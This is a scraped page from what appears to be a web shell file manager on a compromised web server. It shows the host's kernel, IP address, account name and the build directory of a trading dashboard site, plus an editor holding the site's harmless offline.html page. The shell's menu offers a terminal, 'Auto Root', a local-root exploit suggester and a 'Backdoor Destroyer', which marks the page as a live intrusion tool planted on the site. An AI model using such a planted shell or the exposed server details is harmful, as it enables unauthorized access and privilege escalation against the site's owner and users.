Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
virtueex /
dashboard.t-trades.net /
build /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-08-16 04:58
cgi-bin
[ DIR ]
drwxr-xr-x
2026-01-21 17:05
static
[ DIR ]
drwxr-xr-x
2025-08-16 05:00
.htaccess
259
B
-rw-r--r--
2026-02-20 01:08
asset-manifest.json
517
B
-rw-r--r--
2025-08-16 05:00
browserconfig.xml
450
B
-rw-r--r--
2025-05-31 17:01
favicon.ico
3.78
KB
-rw-r--r--
2025-05-23 21:56
index.html
8.98
KB
-rw-r--r--
2025-08-16 05:00
logo192.png
5.22
KB
-rw-r--r--
2025-05-23 21:56
logo512.png
9.44
KB
-rw-r--r--
2025-05-23 21:56
manifest.json
3.19
KB
-rw-r--r--
2025-05-31 16:58
offline.html
7
KB
-rw-r--r--
2025-05-31 16:59
privacy.html
8.31
KB
-rw-r--r--
2025-05-23 21:56
pwabuilder-adv-sw.js
2.91
KB
-rw-r--r--
2025-05-23 21:56
robots.txt
70
B
-rw-r--r--
2025-05-23 21:56
Save
Rename
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>T-TRADES - Offline</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: 'Montserrat', -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; background: linear-gradient(135deg, #000000 0%, #1a1a1a 100%); color: white; min-height: 100vh; display: flex; align-items: center; justify-content: center; text-align: center; padding: 20px; } .offline-container { max-width: 500px; width: 100%; padding: 40px 30px; background: rgba(255, 255, 255, 0.05); border-radius: 20px; backdrop-filter: blur(10px); border: 1px solid rgba(255, 255, 255, 0.1); box-shadow: 0 20px 40px rgba(0, 0, 0, 0.3); } .logo { width: 80px; height: 80px; margin: 0 auto 30px; background: linear-gradient(135deg, #f8a500 0%, #1e553d 100%); border-radius: 50%; display: flex; align-items: center; justify-content: center; font-size: 2rem; font-weight: bold; color: white; } h1 { font-size: 2.5rem; margin-bottom: 15px; background: linear-gradient(135deg, #f8a500 0%, #1e553d 100%); -webkit-background-clip: text; -webkit-text-fill-color: transparent; background-clip: text; } .subtitle { font-size: 1.2rem; color: #ccc; margin-bottom: 30px; } .description { font-size: 1rem; color: #aaa; line-height: 1.6; margin-bottom: 40px; } .retry-btn { background: linear-gradient(135deg, #f8a500 0%, #1e553d 100%); color: white; border: none; padding: 15px 30px; border-radius: 50px; font-size: 1.1rem; font-weight: 600; cursor: pointer; transition: all 0.3s ease; text-decoration: none; display: inline-block; margin: 10px; } .retry-btn:hover { transform: translateY(-2px); box-shadow: 0 10px 25px rgba(248, 165, 0, 0.3); } .features { margin-top: 40px; text-align: left; } .feature-item { display: flex; align-items: center; margin-bottom: 15px; color: #ccc; } .feature-icon { width: 8px; height: 8px; background: #f8a500; border-radius: 50%; margin-right: 15px; } .network-status { margin-top: 20px; padding: 15px; border-radius: 10px; background: rgba(255, 0, 0, 0.1); border: 1px solid rgba(255, 0, 0, 0.3); } .network-status.online { background: rgba(0, 255, 0, 0.1); border: 1px solid rgba(0, 255, 0, 0.3); } @media (max-width: 600px) { .offline-container { padding: 30px 20px; } h1 { font-size: 2rem; } .subtitle { font-size: 1rem; } } @keyframes pulse { 0% { opacity: 1; } 50% { opacity: 0.5; } 100% { opacity: 1; } } .checking { animation: pulse 2s infinite; } </style> </head> <body> <div class="offline-container"> <div class="logo">T</div> <h1>You're Offline</h1> <p class="subtitle">No internet connection detected</p> <p class="description"> T-TRADES requires an internet connection to access real-time trading data and your portfolio. Please check your connection and try again. </p> <button class="retry-btn" onclick="window.location.reload()"> Try Again </button> <a href="/" class="retry-btn"> Go to Homepage </a> <div class="network-status" id="networkStatus"> <div id="networkText">Checking connection...</div> </div> <div class="features"> <div class="feature-item"> <div class="feature-icon"></div> <span>Real-time market data</span> </div> <div class="feature-item"> <div class="feature-icon"></div> <span>Secure portfolio management</span> </div> <div class="feature-item"> <div class="feature-icon"></div> <span>Advanced trading tools</span> </div> <div class="feature-item"> <div class="feature-icon"></div> <span>24/7 market access</span> </div> </div> </div> <script> // Check network status function updateNetworkStatus() { const networkStatus = document.getElementById('networkStatus'); const networkText = document.getElementById('networkText'); if (navigator.onLine) { networkStatus.className = 'network-status online'; networkText.textContent = 'Connection restored! You can now refresh the page.'; // Auto-reload after 2 seconds when connection is restored setTimeout(() => { window.location.reload(); }, 2000); } else { networkStatus.className = 'network-status'; networkText.textContent = 'No internet connection detected.'; } } // Initial check updateNetworkStatus(); // Listen for network changes window.addEventListener('online', updateNetworkStatus); window.addEventListener('offline', updateNetworkStatus); // Retry button functionality function retryConnection() { const networkText = document.getElementById('networkText'); networkText.textContent = 'Checking connection...'; networkText.className = 'checking'; setTimeout(() => { updateNetworkStatus(); networkText.className = ''; }, 1000); } // Check connection every 5 seconds setInterval(updateNetworkStatus, 5000); </script> </body> </html>